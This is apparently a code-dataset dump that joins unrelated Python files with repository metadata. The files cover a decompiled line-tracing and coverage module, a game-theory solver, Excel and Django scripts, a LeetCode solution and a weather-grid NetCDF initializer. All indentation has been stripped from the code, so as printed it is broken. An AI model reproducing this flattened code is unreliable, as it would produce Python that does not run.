# create a Trace object, telling it what to ignore, and whether to
# do tracing or line-counting or both.
tracer = trace.Trace(ignoredirs=[sys.prefix, sys.exec_prefix,], trace=0,
count=1)
# run the new command using the given tracer
tracer.run('main()')
# make a report, placing output in /tmp
r = tracer.results()
r.write_results(show_missing=True, coverdir="/tmp")
"""
import linecache
import os
import re
import sys
import time
import token
import tokenize
import inspect
import gc
import dis
try:
import cPickle
pickle = cPickle
except ImportError:
import pickle
try:
import threading
except ImportError:
_settrace = sys.settrace
def _unsettrace():
sys.settrace(None)
return
else:
def _settrace(func):
threading.settrace(func)
sys.settrace(func)
def _unsettrace():
sys.settrace(None)
threading.settrace(None)
return
def usage(outfile):
outfile.write("Usage: %s [OPTIONS] <file> [ARGS]\n\nMeta-options:\n--help Display this help then exit.\n--version Output version information then exit.\n\nOtherwise, exactly one of the following three options must be given:\n-t, --trace Print each line to sys.stdout before it is executed.\n-c, --count Count the number of times each line is executed\n and write the counts to <module>.cover for each\n module executed, in the module's directory.\n See also `--coverdir', `--file', `--no-report' below.\n-l, --listfuncs Keep track of which functions are executed at least\n once and write the results to sys.stdout after the\n program exits.\n-T, --trackcalls Keep track of caller/called pairs and write the\n results to sys.stdout after the program exits.\n-r, --report Generate a report from a counts file; do not execute\n any code. `--file' must specify the results file to\n read, which must have been created in a previous run\n with `--count --file=FILE'.\n\nModifiers:\n-f, --file=<file> File to accumulate counts over several runs.\n-R, --no-report Do not generate the coverage report files.\n Useful if you want to accumulate over several runs.\n-C, --coverdir=<dir> Directory where the report files. The coverage\n report for <package>.<module> is written to file\n <dir>/<package>/<module>.cover.\n-m, --missing Annotate executable lines that were not executed\n with '>>>>>> '.\n-s, --summary Write a brief summary on stdout for each file.\n (Can only be used with --count or --report.)\n-g, --timing Prefix each line with the time since the program started.\n Only used while tracing.\n\nFilters, may be repeated multiple times:\n--ignore-module=<mod> Ignore the given module(s) and its submodules\n (if it is a package). Accepts comma separated\n list of module names\n--ignore-dir=<dir> Ignore files in the given directory (multiple\n directories can be joined by os.pathsep).\n" % sys.argv[0])
PRAGMA_NOCOVER = '#pragma NO COVER'
rx_blank = re.compile('^\\s*(#.*)?$')
class Ignore:
def __init__(self, modules = None, dirs = None):
self._mods = modules or []
self._dirs = dirs or []
self._dirs = map(os.path.normpath, self._dirs)
self._ignore = {'<string>': 1}
def names(self, filename, modulename):
if modulename in self._ignore:
return self._ignore[modulename]
else:
for mod in self._mods:
if mod == modulename:
self._ignore[modulename] = 1
return 1
n = len(mod)
if mod == modulename[:n] and modulename[n] == '.':
self._ignore[modulename] = 1
return 1
if filename is None:
self._ignore[modulename] = 1
return 1
for d in self._dirs:
if filename.startswith(d + os.sep):
self._ignore[modulename] = 1
return 1
self._ignore[modulename] = 0
return 0
def modname(path):
"""Return a plausible module name for the patch."""
base = os.path.basename(path)
filename, ext = os.path.splitext(base)
return filename
def fullmodname(path):
"""Return a plausible module name for the path."""
comparepath = os.path.normcase(path)
longest = ''
for dir in sys.path:
dir = os.path.normcase(dir)
if comparepath.startswith(dir) and comparepath[len(dir)] == os.sep:
if len(dir) > len(longest):
longest = dir
if longest:
base = path[len(longest) + 1:]
else:
base = path
drive, base = os.path.splitdrive(base)
base = base.replace(os.sep, '.')
if os.altsep:
base = base.replace(os.altsep, '.')
filename, ext = os.path.splitext(base)
return filename.lstrip('.')
class CoverageResults:
def __init__(self, counts = None, calledfuncs = None, infile = None, callers = None, outfile = None):
self.counts = counts
if self.counts is None:
self.counts = {}
self.counter = self.counts.copy()
self.calledfuncs = calledfuncs
if self.calledfuncs is None:
self.calledfuncs = {}
self.calledfuncs = self.calledfuncs.copy()
self.callers = callers
if self.callers is None:
self.callers = {}
self.callers = self.callers.copy()
self.infile = infile
self.outfile = outfile
if self.infile:
try:
counts, calledfuncs, callers = pickle.load(open(self.infile, 'rb'))
self.update(self.__class__(counts, calledfuncs, callers))
except (IOError, EOFError, ValueError) as err:
print >> sys.stderr, 'Skipping counts file %r: %s' % (self.infile, err)
return
def update(self, other):
"""Merge in the data from another CoverageResults"""
counts = self.counts
calledfuncs = self.calledfuncs
callers = self.callers
other_counts = other.counts
other_calledfuncs = other.calledfuncs
other_callers = other.callers
for key in other_counts.keys():
counts[key] = counts.get(key, 0) + other_counts[key]
for key in other_calledfuncs.keys():
calledfuncs[key] = 1
for key in other_callers.keys():
callers[key] = 1
def write_results(self, show_missing = True, summary = False, coverdir = None):
"""
@param coverdir
"""
if self.calledfuncs:
print
print 'functions called:'
calls = self.calledfuncs.keys()
calls.sort()
for filename, modulename, funcname in calls:
print 'filename: %s, modulename: %s, funcname: %s' % (filename, modulename, funcname)
if self.callers:
print
print 'calling relationships:'
calls = self.callers.keys()
calls.sort()
lastfile = lastcfile = ''
for (pfile, pmod, pfunc), (cfile, cmod, cfunc) in calls:
if pfile != lastfile:
print
print '***', pfile, '***'
lastfile = pfile
lastcfile = ''
if cfile != pfile and lastcfile != cfile:
print ' -->', cfile
lastcfile = cfile
print ' %s.%s -> %s.%s' % (pmod,
pfunc,
cmod,
cfunc)
per_file = {}
for filename, lineno in self.counts.keys():
lines_hit = per_file[filename] = per_file.get(filename, {})
lines_hit[lineno] = self.counts[filename, lineno]
sums = {}
for filename, count in per_file.iteritems():
if filename == '<string>':
continue
if filename.startswith('<doctest '):
continue
if filename.endswith(('.pyc', '.pyo')):
filename = filename[:-1]
if coverdir is None:
dir = os.path.dirname(os.path.abspath(filename))
modulename = modname(filename)
else:
dir = coverdir
if not os.path.exists(dir):
os.makedirs(dir)
modulename = fullmodname(filename)
if show_missing:
lnotab = find_executable_linenos(filename)
else:
lnotab = {}
source = linecache.getlines(filename)
coverpath = os.path.join(dir, modulename + '.cover')
n_hits, n_lines = self.write_results_file(coverpath, source, lnotab, count)
if summary and n_lines:
percent = 100 * n_hits // n_lines
sums[modulename] = (n_lines,
percent,
modulename,
filename)
if summary and sums:
mods = sums.keys()
mods.sort()
print 'lines cov% module (path)'
for m in mods:
n_lines, percent, modulename, filename = sums[m]
print '%5d %3d%% %s (%s)' % sums[m]
if self.outfile:
try:
pickle.dump((self.counts, self.calledfuncs, self.callers), open(self.outfile, 'wb'), 1)
except IOError as err:
print >> sys.stderr, "Can't save counts files because %s" % err
return
def write_results_file(self, path, lines, lnotab, lines_hit):
"""Return a coverage results file in path."""
try:
outfile = open(path, 'w')
except IOError as err:
print >> sys.stderr, 'trace: Could not open %r for writing: %s- skipping' % (path, err)
return (0, 0)
n_lines = 0
n_hits = 0
for i, line in enumerate(lines):
lineno = i + 1
if lineno in lines_hit:
outfile.write('%5d: ' % lines_hit[lineno])
n_hits += 1
n_lines += 1
elif rx_blank.match(line):
outfile.write(' ')
elif lineno in lnotab and PRAGMA_NOCOVER not in lines[i]:
outfile.write('>>>>>> ')
n_lines += 1
else:
outfile.write(' ')
outfile.write(lines[i].expandtabs(8))
outfile.close()
return (n_hits, n_lines)
def find_lines_from_code(code, strs):
"""Return dict where keys are lines in the line number table."""
linenos = {}
for _, lineno in dis.findlinestarts(code):
if lineno not in strs:
linenos[lineno] = 1
return linenos
def find_lines(code, strs):
"""Return lineno dict for all code objects reachable from code."""
linenos = find_lines_from_code(code, strs)
for c in code.co_consts:
if inspect.iscode(c):
linenos.update(find_lines(c, strs))
return linenos
def find_strings(filename):
"""Return a dict of possible docstring positions.
The dict maps line numbers to strings. There is an entry for
line that contains only a string or a part of a triple-quoted
string.
"""
d = {}
prev_ttype = token.INDENT
f = open(filename)
for ttype, tstr, start, end, line in tokenize.generate_tokens(f.readline):
if ttype == token.STRING:
if prev_ttype == token.INDENT:
sline, scol = start
eline, ecol = end
for i in range(sline, eline + 1):
d[i] = 1
prev_ttype = ttype
f.close()
return d
def find_executable_linenos(filename):
"""Return dict where keys are line numbers in the line number table."""
try:
prog = open(filename, 'rU').read()
except IOError as err:
print >> sys.stderr, 'Not printing coverage data for %r: %s' % (filename, err)
return {}
code = compile(prog, filename, 'exec')
strs = find_strings(filename)
return find_lines(code, strs)
class Trace:
def __init__(self, count = 1, trace = 1, countfuncs = 0, countcallers = 0, ignoremods = (), ignoredirs = (), infile = None, outfile = None, timing = False):
"""
@param count true iff it should count number of times each
line is executed
@param trace true iff it should print out each line that is
being counted
@param countfuncs true iff it should just output a list of
(filename, modulename, funcname,) for functions
that were called at least once; This overrides
`count' and `trace'
@param ignoremods a list of the names of modules to ignore
@param ignoredirs a list of the names of directories to ignore
all of the (recursive) contents of
@param infile file from which to read stored counts to be
added into the results
@param outfile file in which to write the results
@param timing true iff timing information be displayed
"""
self.infile = infile
self.outfile = outfile
self.ignore = Ignore(ignoremods, ignoredirs)
self.counts = {}
self.blabbed = {}
self.pathtobasename = {}
self.donothing = 0
self.trace = trace
self._calledfuncs = {}
self._callers = {}
self._caller_cache = {}
self.start_time = None
if timing:
self.start_time = time.time()
if countcallers:
self.globaltrace = self.globaltrace_trackcallers
elif countfuncs:
self.globaltrace = self.globaltrace_countfuncs
elif trace and count:
self.globaltrace = self.globaltrace_lt
self.localtrace = self.localtrace_trace_and_count
elif trace:
self.globaltrace = self.globaltrace_lt
self.localtrace = self.localtrace_trace
elif count:
self.globaltrace = self.globaltrace_lt
self.localtrace = self.localtrace_count
else:
self.donothing = 1
return
def run(self, cmd):
import __main__
dict = __main__.__dict__
self.runctx(cmd, dict, dict)
def runctx(self, cmd, globals = None, locals = None):
if globals is None:
globals = {}
if locals is None:
locals = {}
if not self.donothing:
_settrace(self.globaltrace)
try:
exec cmd in globals, locals
finally:
if not self.donothing:
_unsettrace()
return
def runfunc(self, func, *args, **kw):
result = None
if not self.donothing:
sys.settrace(self.globaltrace)
try:
result = func(*args, **kw)
finally:
if not self.donothing:
sys.settrace(None)
return result
def file_module_function_of(self, frame):
code = frame.f_code
filename = code.co_filename
if filename:
modulename = modname(filename)
else:
modulename = None
funcname = code.co_name
clsname = None
if code in self._caller_cache:
if self._caller_cache[code] is not None:
clsname = self._caller_cache[code]
else:
self._caller_cache[code] = None
funcs = [ f for f in gc.get_referrers(code) if inspect.isfunction(f) ]
if len(funcs) == 1:
dicts = [ d for d in gc.get_referrers(funcs[0]) if isinstance(d, dict) ]
if len(dicts) == 1:
classes = [ c for c in gc.get_referrers(dicts[0]) if hasattr(c, '__bases__') ]
if len(classes) == 1:
clsname = classes[0].__name__
self._caller_cache[code] = clsname
if clsname is not None:
funcname = '%s.%s' % (clsname, funcname)
return (filename, modulename, funcname)
def globaltrace_trackcallers(self, frame, why, arg):
"""Handler for call events.
Adds information about who called who to the self._callers dict.
"""
if why == 'call':
this_func = self.file_module_function_of(frame)
parent_func = self.file_module_function_of(frame.f_back)
self._callers[parent_func, this_func] = 1
def globaltrace_countfuncs(self, frame, why, arg):
"""Handler for call events.
Adds (filename, modulename, funcname) to the self._calledfuncs dict.
"""
if why == 'call':
this_func = self.file_module_function_of(frame)
self._calledfuncs[this_func] = 1
def globaltrace_lt(self, frame, why, arg):
"""Handler for call events.
If the code block being entered is to be ignored, returns `None',
else returns self.localtrace.
"""
if why == 'call':
code = frame.f_code
filename = frame.f_globals.get('__file__', None)
if filename:
modulename = modname(filename)
if modulename is not None:
ignore_it = self.ignore.names(filename, modulename)
if not ignore_it:
if self.trace:
print ' --- modulename: %s, funcname: %s' % (modulename, code.co_name)
return self.localtrace
else:
return
return
def localtrace_trace_and_count(self, frame, why, arg):
if why == 'line':
filename = frame.f_code.co_filename
lineno = frame.f_lineno
key = (filename, lineno)
self.counts[key] = self.counts.get(key, 0) + 1
if self.start_time:
print '%.2f' % (time.time() - self.start_time),
bname = os.path.basename(filename)
print '%s(%d): %s' % (bname, lineno, linecache.getline(filename, lineno)),
return self.localtrace
def localtrace_trace(self, frame, why, arg):
if why == 'line':
filename = frame.f_code.co_filename
lineno = frame.f_lineno
if self.start_time:
print '%.2f' % (time.time() - self.start_time),
bname = os.path.basename(filename)
print '%s(%d): %s' % (bname, lineno, linecache.getline(filename, lineno)),
return self.localtrace
def localtrace_count(self, frame, why, arg):
if why == 'line':
filename = frame.f_code.co_filename
lineno = frame.f_lineno
key = (filename, lineno)
self.counts[key] = self.counts.get(key, 0) + 1
return self.localtrace
def results(self):
return CoverageResults(self.counts, infile=self.infile, outfile=self.outfile, calledfuncs=self._calledfuncs, callers=self._callers)
def _err_exit(msg):
sys.stderr.write('%s: %s\n' % (sys.argv[0], msg))
sys.exit(1)
def main(argv = None):
import getopt
if argv is None:
argv = sys.argv
try:
opts, prog_argv = getopt.getopt(argv[1:], 'tcrRf:d:msC:lTg', ['help',
'version',
'trace',
'count',
'report',
'no-report',
'summary',
'file=',
'missing',
'ignore-module=',
'ignore-dir=',
'coverdir=',
'listfuncs',
'trackcalls',
'timing'])
except getopt.error as msg:
sys.stderr.write('%s: %s\n' % (sys.argv[0], msg))
sys.stderr.write("Try `%s --help' for more information\n" % sys.argv[0])
sys.exit(1)
trace = 0
count = 0
report = 0
no_report = 0
counts_file = None
missing = 0
ignore_modules = []
ignore_dirs = []
coverdir = None
summary = 0
listfuncs = False
countcallers = False
timing = False
for opt, val in opts:
if opt == '--help':
usage(sys.stdout)
sys.exit(0)
if opt == '--version':
sys.stdout.write('trace 2.0\n')
sys.exit(0)
if opt == '-T' or opt == '--trackcalls':
countcallers = True
continue
if opt == '-l' or opt == '--listfuncs':
listfuncs = True
continue
if opt == '-g' or opt == '--timing':
timing = True
continue
if opt == '-t' or opt == '--trace':
trace = 1
continue
if opt == '-c' or opt == '--count':
count = 1
continue
if opt == '-r' or opt == '--report':
report = 1
continue
if opt == '-R' or opt == '--no-report':
no_report = 1
continue
if opt == '-f' or opt == '--file':
counts_file = val
continue
if opt == '-m' or opt == '--missing':
missing = 1
continue
if opt == '-C' or opt == '--coverdir':
coverdir = val
continue
if opt == '-s' or opt == '--summary':
summary = 1
continue
if opt == '--ignore-module':
for mod in val.split(','):
ignore_modules.append(mod.strip())
continue
if opt == '--ignore-dir':
for s in val.split(os.pathsep):
s = os.path.expandvars(s)
s = s.replace('$prefix', os.path.join(sys.prefix, 'lib', 'python' + sys.version[:3]))
s = s.replace('$exec_prefix', os.path.join(sys.exec_prefix, 'lib', 'python' + sys.version[:3]))
s = os.path.normpath(s)
ignore_dirs.append(s)
continue
raise 0 or AssertionError('Should never get here')
if listfuncs and (count or trace):
_err_exit('cannot specify both --listfuncs and (--trace or --count)')
if not (count or trace or report or listfuncs or countcallers):
_err_exit('must specify one of --trace, --count, --report, --listfuncs, or --trackcalls')
if report and no_report:
_err_exit('cannot specify both --report and --no-report')
if report and not counts_file:
_err_exit('--report requires a --file')
if no_report and len(prog_argv) == 0:
_err_exit('missing name of file to run')
if report:
results = CoverageResults(infile=counts_file, outfile=counts_file)
results.write_results(missing, summary=summary, coverdir=coverdir)
else:
sys.argv = prog_argv
progname = prog_argv[0]
sys.path[0] = os.path.split(progname)[0]
t = Trace(count, trace, countfuncs=listfuncs, countcallers=countcallers, ignoremods=ignore_modules, ignoredirs=ignore_dirs, infile=counts_file, outfile=counts_file, timing=timing)
try:
with open(progname) as fp:
code = compile(fp.read(), progname, 'exec')
globs = {'__file__': progname,
'__name__': '__main__',
'__package__': None,
'__cached__': None}
t.runctx(code, globs, globs)
except IOError as err:
_err_exit('Cannot run file %r because: %s' % (sys.argv[0], err))
except SystemExit:
pass
results = t.results()
if not no_report:
results.write_results(missing, summary=summary, coverdir=coverdir)
return
if __name__ == '__main__':
main()
# okay decompyling c:\Users\PC\wotsources\files\originals\res_bw\scripts\common\lib\trace.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.05.01 15:28:28 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
c26fd50d1c7bcce85657403551fdc8dcd43b54cd | c3614e4bc024f4c0f619eaa05ce3f2e068d2e82d | /cutting_game.py | e4236f6016472df8e83d460246c1aa1bf42ee696 | [] | no_license | yukikawana/aoj | 68b2853b52975d4d066cd91b8cc6ee57c7c7d5c1 | cf53dc9957f02185e8b83b9c2ee28079ba88b2a5 | refs/heads/master | 2020-04-01T17:55:29.259738 | 2018-10-17T09:15:44 | 2018-10-17T09:15:44 | 153,459,439 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | from utils import input_int
mem = {}
def grundy(H, W):
key = (H, W)
if key in mem:
return mem[key]
s = []
for h in range(2, H - 1):
s.append(grundy(h, W) ^ grundy(H - h, W))
for w in range(2, W - 1):
s.append(grundy(H, w) ^ grundy(H, W - w))
cnt = 0
while cnt in s:
cnt+=1
mem[key] = cnt
return mem[key]
def main():
H = input_int("h = ")
W = input_int("w = ")
print("Alice wins" if grundy(H, W) else "Bob wins")
if __name__ == "__main__":
main()
| [
"kojirou.tensou@gmail.com"
] | kojirou.tensou@gmail.com |
e10e9064f3dc573fd39344ceefbdf8c3bcd548cf | b2b1e16968474ed573ebbebc1ee84bca59adbae1 | /ExcelParser/CountRows.py | f2759fce4c40fa1930aaef464718571aec7d2c72 | [] | no_license | shahpriyesh/PracticeCode | a03979d92a092bdbb5d0c7cfc1cfebc3f82e1c91 | 2afc3d0b3cd58d80ceb825a3ff0d190893e729fa | refs/heads/master | 2022-11-29T12:37:01.719792 | 2020-07-27T18:02:51 | 2020-07-27T18:02:51 | 257,656,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,139 | py | import xlrd
from openpyxl import *
def countEqualEntries(excel_file, sheet_name):
wb = xlrd.open_workbook(excel_file)
sheet = wb.sheet_by_name(sheet_name)
counter = {}
for i in range(1, sheet.nrows):
row = sheet.row_values(i)
if row[0] in counter:
counter[row[0]][0] += 1
if isinstance(row[-2], str):
counter[row[0]][3].append(row[-2])
else:
# List contains (Count, Question string, difficulty level, list of company names)
if 'Easy' in row:
counter[row[0]] = [1, row[1], 'Easy', []]
elif 'Medium' in row:
counter[row[0]] = [1, row[1], 'Medium', []]
else:
counter[row[0]] = [1, row[1], 'Hard', []]
if isinstance(row[-2], str):
counter[row[0]][3].append(row[-2])
wb.release_resources()
del wb
return counter
def writeTotalEntries(excel_file, sheet_name, counter):
wb = load_workbook(excel_file)
sheet = wb[sheet_name]
unique = set()
for i in range(1, sheet.max_row):
c1 = sheet.cell(row=i, column=1)
c9 = sheet.cell(row=i, column=9)
c10 = sheet.cell(row=i, column=10)
c11 = sheet.cell(row=i, column=11)
# writing values to cells
if c1.value and c1.value not in unique:
mapping = counter[c1.value]
c9.value = mapping[0]
c10.value = mapping[2]
c11.value = ', '.join(mapping[3])
unique.add(c1.value)
wb.save(excel_file)
wb.close()
def reformatEntries(excel_file, sheet_name):
unique = set()
wb = load_workbook(excel_file)
sheet = wb[sheet_name]
for i in range(1, sheet.max_row):
c1 = sheet.cell(row=i, column=1)
if c1.value in unique:
sheet.delete_rows(i, 1)
unique.add(c1.value)
wb.save(excel_file)
wb.close()
filename = "/Users/pshah/Downloads/Leetcode_FAQ.xlsx"
sheetname = "FAQs"
counter = countEqualEntries(filename, sheetname)
writeTotalEntries(filename, sheetname, counter)
# reformatEntries(filename, sheetname) | [
"priyesh.shah@hitachivantara.com"
] | priyesh.shah@hitachivantara.com |
bbc0777dcd645f87565fccb02a0a3c22c08f6d20 | ae9fc81dd2a93a614c8e579b570ac3f4d2962392 | /Application/ReclamaCaicoProject/ReclamaCaicoApp/migrations/0001_initial.py | b020c4f1719f8084cc01a6631931c51963a8fdd4 | [
"MIT"
] | permissive | WesleyVitor/ReclamaCaico | c3743d40771a808c8238a93513ef54829413d314 | df67997821fc00236f1d9c77e8685ed8e4a6934b | refs/heads/master | 2022-12-10T21:43:23.615702 | 2020-09-17T17:18:34 | 2020-09-17T17:18:34 | 260,520,207 | 0 | 0 | MIT | 2020-09-17T17:18:35 | 2020-05-01T17:38:45 | Python | UTF-8 | Python | false | false | 1,912 | py | # Generated by Django 2.2.2 on 2019-09-02 11:25
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Login',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=200)),
('password', models.CharField(max_length=200)),
],
),
migrations.CreateModel(
name='Reclamacao',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('titulo', models.CharField(default='w', max_length=20)),
('nome', models.CharField(max_length=200)),
('bairro', models.CharField(max_length=200)),
('rua', models.CharField(max_length=200)),
('Ncasa', models.IntegerField()),
('foto', models.ImageField(default='w', upload_to='Reclama')),
('descricao', models.TextField(default='w', max_length=300)),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Comentario',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text1', models.TextField(max_length=1000)),
('idd', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ReclamaCaicoApp.Reclamacao')),
],
),
]
| [
"wesleydemorais@outlook.com.br"
] | wesleydemorais@outlook.com.br |
f3eaff00fba343a8a4a7f1ceb74a608f98fca37c | 99ba551645dc9beed36f0478b396977c50c3e7ef | /leetcode-vscode/438.找到字符串中所有字母异位词.py | da5c5fdcfc35c7bed066617bb31112a2426144bb | [] | no_license | wulinlw/leetcode_cn | 57381b35d128fb3dad027208935d3de3391abfd0 | b0f498ebe84e46b7e17e94759dd462891dcc8f85 | refs/heads/master | 2021-08-09T17:26:45.688513 | 2021-07-15T14:38:30 | 2021-07-15T14:38:30 | 134,419,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,625 | py | #
# @lc app=leetcode.cn id=438 lang=python3
#
# [438] 找到字符串中所有字母异位词
#
# https://leetcode-cn.com/problems/find-all-anagrams-in-a-string/description/
#
# algorithms
# Medium (41.20%)
# Likes: 247
# Dislikes: 0
# Total Accepted: 21.8K
# Total Submissions: 51.4K
# Testcase Example: '"cbaebabacd"\n"abc"'
#
# 给定一个字符串 s 和一个非空字符串 p,找到 s 中所有是 p 的字母异位词的子串,返回这些子串的起始索引。
#
# 字符串只包含小写英文字母,并且字符串 s 和 p 的长度都不超过 20100。
#
# 说明:
#
#
# 字母异位词指字母相同,但排列不同的字符串。
# 不考虑答案输出的顺序。
#
#
# 示例 1:
#
#
# 输入:
# s: "cbaebabacd" p: "abc"
#
# 输出:
# [0, 6]
#
# 解释:
# 起始索引等于 0 的子串是 "cba", 它是 "abc" 的字母异位词。
# 起始索引等于 6 的子串是 "bac", 它是 "abc" 的字母异位词。
#
#
# 示例 2:
#
#
# 输入:
# s: "abab" p: "ab"
#
# 输出:
# [0, 1, 2]
#
# 解释:
# 起始索引等于 0 的子串是 "ab", 它是 "ab" 的字母异位词。
# 起始索引等于 1 的子串是 "ba", 它是 "ab" 的字母异位词。
# 起始索引等于 2 的子串是 "ab", 它是 "ab" 的字母异位词。
#
#
#
from typing import List
# @lc code=start
class Solution:
def findAnagrams(self, s: str, p: str) -> List[int]:
left, right = 0, 0 #滑动窗口左边边界
window = {} #滑动窗口
need = {} #统计p的字符数
re = []
for i in p:
need[i] = need.get(i,0) + 1
for right in range(len(s)): #右边窗口滑动
window[s[right]] = window.get(s[right], 0) + 1 #每次滑动新加入右侧值到window中
if left + len(p) == right: #窗口满了,那就把左边的弹出去
if window[s[left]] == 1: #只有1个时需要删掉key,不然后面dict对比有问题
window.pop(s[left])
else:
window[s[left]] -= 1
left += 1 #左窗口右移一位
if window == need: #一样就把左窗口坐标加入结果
re.append(left)
return re
# @lc code=end
s = "cbaebabacd"
p = "abc"
# s = "abab"
# p = "ab"
# s = "baa"
# p = "aa"
o = Solution()
print(o.findAnagrams(s, p)) | [
"wulinlw@gmail.com"
] | wulinlw@gmail.com |
8cda640d958088ed52e602287e97730545bd2a62 | a99a44aee5cfc5e080f6d83d2bcc1c3d273a3426 | /scripts/iemre/init_hourly.py | 4876319dfe3c2b9cd95b3aa45e88caad6deaf8c6 | [
"MIT"
] | permissive | ragesah/iem | 1513929c8bc7f254048271d61b4c4cf27a5731d7 | 8ed970d426bddeaa3e7ded593665d22f0f9f6e87 | refs/heads/main | 2023-08-20T20:01:15.480833 | 2021-10-12T15:44:52 | 2021-10-12T15:44:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,467 | py | """Generate the IEMRE hourly analysis file for a year"""
import datetime
import sys
import os
import geopandas as gpd
import numpy as np
from pyiem import iemre
from pyiem.grid.zs import CachingZonalStats
from pyiem.util import get_dbconn, ncopen, logger
LOG = logger()
def init_year(ts):
"""
Create a new NetCDF file for a year of our specification!
"""
fn = iemre.get_hourly_ncname(ts.year)
if os.path.isfile(fn):
LOG.info("Cowardly refusing to overwrite: %s", fn)
return
nc = ncopen(fn, "w")
nc.title = "IEM Hourly Reanalysis %s" % (ts.year,)
nc.platform = "Grided Observations"
nc.description = "IEM hourly analysis on a 0.125 degree grid"
nc.institution = "Iowa State University, Ames, IA, USA"
nc.source = "Iowa Environmental Mesonet"
nc.project_id = "IEM"
nc.realization = 1
nc.Conventions = "CF-1.0"
nc.contact = "Daryl Herzmann, akrherz@iastate.edu, 515-294-5978"
nc.history = ("%s Generated") % (
datetime.datetime.now().strftime("%d %B %Y"),
)
nc.comment = "No Comment at this time"
# Setup Dimensions
nc.createDimension("lat", iemre.NY)
nc.createDimension("lon", iemre.NX)
ts2 = datetime.datetime(ts.year + 1, 1, 1)
days = (ts2 - ts).days
LOG.info("Year %s has %s days", ts.year, days)
nc.createDimension("time", int(days) * 24)
# Setup Coordinate Variables
lat = nc.createVariable("lat", float, ("lat",))
lat.units = "degrees_north"
lat.long_name = "Latitude"
lat.standard_name = "latitude"
lat.axis = "Y"
lat[:] = iemre.YAXIS
lon = nc.createVariable("lon", float, ("lon",))
lon.units = "degrees_east"
lon.long_name = "Longitude"
lon.standard_name = "longitude"
lon.axis = "X"
lon[:] = iemre.XAXIS
tm = nc.createVariable("time", float, ("time",))
tm.units = "Hours since %s-01-01 00:00:0.0" % (ts.year,)
tm.long_name = "Time"
tm.standard_name = "time"
tm.axis = "T"
tm.calendar = "gregorian"
tm[:] = np.arange(0, int(days) * 24)
# Tracked variables
hasdata = nc.createVariable("hasdata", np.int8, ("lat", "lon"))
hasdata.units = "1"
hasdata.long_name = "Analysis Available for Grid Cell"
hasdata.coordinates = "lon lat"
hasdata[:] = 0
# can storage -128->127 actual values are 0 to 100
skyc = nc.createVariable(
"skyc", np.int8, ("time", "lat", "lon"), fill_value=-128
)
skyc.long_name = "ASOS Sky Coverage"
skyc.stanard_name = "ASOS Sky Coverage"
skyc.units = "%"
skyc.valid_range = [0, 100]
skyc.coordinates = "lon lat"
# 0->65535
tmpk = nc.createVariable(
"tmpk", np.uint16, ("time", "lat", "lon"), fill_value=65535
)
tmpk.units = "K"
tmpk.scale_factor = 0.01
tmpk.long_name = "2m Air Temperature"
tmpk.standard_name = "2m Air Temperature"
tmpk.coordinates = "lon lat"
# 0->65535 0 to 655.35
dwpk = nc.createVariable(
"dwpk", np.uint16, ("time", "lat", "lon"), fill_value=65335
)
dwpk.units = "K"
dwpk.scale_factor = 0.01
dwpk.long_name = "2m Air Dew Point Temperature"
dwpk.standard_name = "2m Air Dew Point Temperature"
dwpk.coordinates = "lon lat"
# NOTE: we need to store negative numbers here, gasp
# -32768 to 32767 so -65.5 to 65.5 mps
uwnd = nc.createVariable(
"uwnd", np.int16, ("time", "lat", "lon"), fill_value=32767
)
uwnd.scale_factor = 0.002
uwnd.units = "meters per second"
uwnd.long_name = "U component of the wind"
uwnd.standard_name = "U component of the wind"
uwnd.coordinates = "lon lat"
# NOTE: we need to store negative numbers here, gasp
# -32768 to 32767 so -65.5 to 65.5 mps
vwnd = nc.createVariable(
"vwnd", np.int16, ("time", "lat", "lon"), fill_value=32767
)
vwnd.scale_factor = 0.002
vwnd.units = "meters per second"
vwnd.long_name = "V component of the wind"
vwnd.standard_name = "V component of the wind"
vwnd.coordinates = "lon lat"
# 0->65535 0 to 655.35
p01m = nc.createVariable(
"p01m", np.uint16, ("time", "lat", "lon"), fill_value=65535
)
p01m.units = "mm"
p01m.scale_factor = 0.01
p01m.long_name = "Precipitation"
p01m.standard_name = "Precipitation"
p01m.coordinates = "lon lat"
p01m.description = "Precipitation accumulation for the hour valid time"
nc.close()
def compute_hasdata(year):
"""Compute the has_data grid"""
nc = ncopen(iemre.get_hourly_ncname(year), "a", timeout=300)
czs = CachingZonalStats(iemre.AFFINE)
pgconn = get_dbconn("postgis")
states = gpd.GeoDataFrame.from_postgis(
"SELECT the_geom, state_abbr from states",
pgconn,
index_col="state_abbr",
geom_col="the_geom",
)
data = np.flipud(nc.variables["hasdata"][:, :])
czs.gen_stats(data, states["the_geom"])
for nav in czs.gridnav:
if nav is None:
continue
grid = np.ones((nav.ysz, nav.xsz))
grid[nav.mask] = 0.0
jslice = slice(nav.y0, nav.y0 + nav.ysz)
islice = slice(nav.x0, nav.x0 + nav.xsz)
data[jslice, islice] = np.where(grid > 0, 1, data[jslice, islice])
nc.variables["hasdata"][:, :] = np.flipud(data)
nc.close()
def main(argv):
"""Go Main Go"""
year = int(argv[1])
init_year(datetime.datetime(year, 1, 1))
compute_hasdata(year)
if __name__ == "__main__":
main(sys.argv)
| [
"akrherz@iastate.edu"
] | akrherz@iastate.edu |
805e26a503b1e54e65411035aebfd19197d9f38b | 9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56 | /google/ads/googleads/v9/enums/types/ad_group_criterion_approval_status.py | 76072e9401b3ddc6e578d95c993b65b3da5a7ca1 | [
"Apache-2.0"
